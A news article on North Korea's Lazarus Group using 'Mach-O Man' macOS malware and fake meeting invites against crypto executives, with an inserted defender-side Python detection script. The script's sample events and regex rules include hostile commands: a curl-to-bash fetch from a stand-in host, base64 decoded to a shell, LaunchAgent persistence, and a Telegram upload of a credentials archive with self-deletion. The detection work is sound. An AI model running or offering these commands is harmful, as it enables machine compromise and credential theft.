    North Korea’s Lazarus Group targets crypto execs with new macOS malware

By James Wilson, April 22, 2026

    North Korea’s Lazarus Group is using “Mach-O Man” macOS malware and fake meeting invites to hijack crypto execs and fund nine-figure DeFi raids.

    Summary

    • CertiK flags “Mach-O Man,” a Lazarus-built macOS toolkit hitting crypto and fintech executives.
    • Campaign uses ClickFix-style fake meeting invites to trick victims into pasting terminal commands.
    • Researchers link Lazarus to over $500 million stolen from Drift and KelpDAO in recent DeFi raids.

    Lazarus, the North Korean state-backed hacking outfit, has rolled out a new macOS malware campaign aimed squarely at executives in fintech and crypto, according to blockchain security firm CertiK.
    The operation, dubbed “Mach-O Man,” chains social engineering and terminal-level payloads to steal crypto and sensitive corporate data while leaving almost no trace on disk.

    CertiK researchers say the campaign leans on the ClickFix technique, where victims are lured into pasting what look like “repair” or “verification” commands directly into macOS Terminal during fake support or meeting flows. In this case, the lures arrive as bogus online meeting invitations that “trick victims into pasting malicious repair commands into Mac terminals,” with the toolkit auto-deleting after use to frustrate forensics, CertiK’s analysis noted.

    According to threat intelligence firm SOC Prime, the “Mach-O Man” framework is tied to Lazarus’ Famous Chollima unit and distributed through compromised Telegram accounts and fake meeting invites targeting high-value crypto and financial organizations. The toolkit, according to CoinDesk, includes multiple Mach-O binaries designed to profile the host, establish persistence, and exfiltrate credentials and browser data via Telegram-based command-and-control.
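As an added defender-side illustration (not code from the article, CertiK, SOC Prime or CoinDesk), the Python script below scores process-execution events against the behaviours described above: a download-or-decode-and-run command pasted into Terminal, a LaunchAgent persistence write, Telegram Bot API traffic, and a script deleting itself. The sample events, and every URL, token and path inside them, are constructed for this example.

```python
import re

# Constructed sample: (parent process, command line) pairs as they might appear
# in a process-execution audit feed from a macOS host. These lines are invented
# for this example; they are not indicators from the article or from CertiK.
SAMPLE_EVENTS = [
    ("Terminal", "ls -la ~/Documents"),
    ("Terminal", "git pull origin main"),
    ("Terminal", "curl -fsSL http://meet-invite.example/fix | bash"),
    ("Terminal", "echo aGVsbG8= | base64 -d | sh"),
    ("bash", "cp ./helper.plist ~/Library/LaunchAgents/; launchctl load ~/Library/LaunchAgents/helper.plist"),
    ("bash", "curl -s -X POST https://api.telegram.org/botTOKEN/sendDocument -F document=@/tmp/creds.zip; rm -f $0"),
]

# One rule per behaviour the article attributes to the campaign, with a weight:
# download-and-run and decode-and-run are the ClickFix paste itself, the
# LaunchAgent write is persistence, the Telegram Bot API is the C2 channel,
# and "rm -f $0" is the toolkit deleting itself to frustrate forensics.
RULES = {
    "remote_fetch_to_shell": (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"), 3),
    "decode_to_shell": (re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba|z)?sh\b"), 3),
    "launch_agent_persistence": (re.compile(r"Library/LaunchAgents|launchctl\s+(load|bootstrap)\b"), 2),
    "telegram_c2": (re.compile(r"api\.telegram\.org/bot"), 3),
    "self_delete": (re.compile(r'\brm\s+-r?f\s+("?\$0"?|\$BASH_SOURCE)'), 2),
}

def score_command(cmd: str) -> tuple[int, list[str]]:
    """Return the summed weight of matching rules and the rule names that fired."""
    hits = [name for name, (pattern, _) in RULES.items() if pattern.search(cmd)]
    return sum(RULES[name][1] for name in hits), hits

def triage(events, threshold: int = 3) -> list[dict]:
    """Flag events whose score reaches the threshold.

    A single low-weight indicator (a LaunchAgent install by itself) does not
    alert, because legitimate installers do that too; the ClickFix paste and
    the Telegram exfiltration each score high enough on their own.
    """
    alerts = []
    for proc, cmd in events:
        score, hits = score_command(cmd)
        if score >= threshold:
            alerts.append({"process": proc, "command": cmd, "score": score, "rules": hits})
    return alerts

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"[{alert['score']}] {alert['process']}: {alert['command']}")
        print("    rules:", ", ".join(alert["rules"]))
```

Feed it real EDR or audit telemetry in the same (process, command) shape; the weights are a starting point to tune against your own baseline of installer and developer activity.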

    Google Cloud’s Mandiant previously described similar macOS campaigns mixing ClickFix with AI-assisted video deepfakes, fake Zoom calls, and hijacked messaging accounts to push targets into executing obfuscated commands.
    “The campaign used a compromised Telegram account, a fake Zoom meeting, and AI-assisted deception to trick victims into executing terminal commands leading to a macOS infection chain,” Mandiant researchers wrote.

    CertiK researcher Natalie Newson linked the latest “Mach-O Man” wave to a broader Lazarus push that has siphoned more than $500 million from DeFi platforms Drift and KelpDAO in just over two weeks.
    In those incidents, Lazarus allegedly combined social engineering against a trading firm with a sophisticated cross-chain exploit that allowed attackers to mint roughly 116,500 rsETH and drain about $292 million in value.

    LayerZero, which provides the bridge infrastructure used by KelpDAO, said North Korea’s Lazarus Group is the “likely actor” behind the rsETH exploit and blamed a single-point-of-failure verifier design for enabling the forged cross-chain message.

    “Lazarus has been targeting the cryptocurrency ecosystem for years, stealing roughly $2 billion in virtual assets in 2023 and 2024,” security outlet SecurityWeek reported, citing prior ClickFix-enabled campaigns.

With DeFi already suffering what research outlets have called its worst month on record for hacks, markets are now effectively pricing in another $100 million-plus exploit this year, underscoring how state-linked attackers like Lazarus have become a systemic risk to crypto.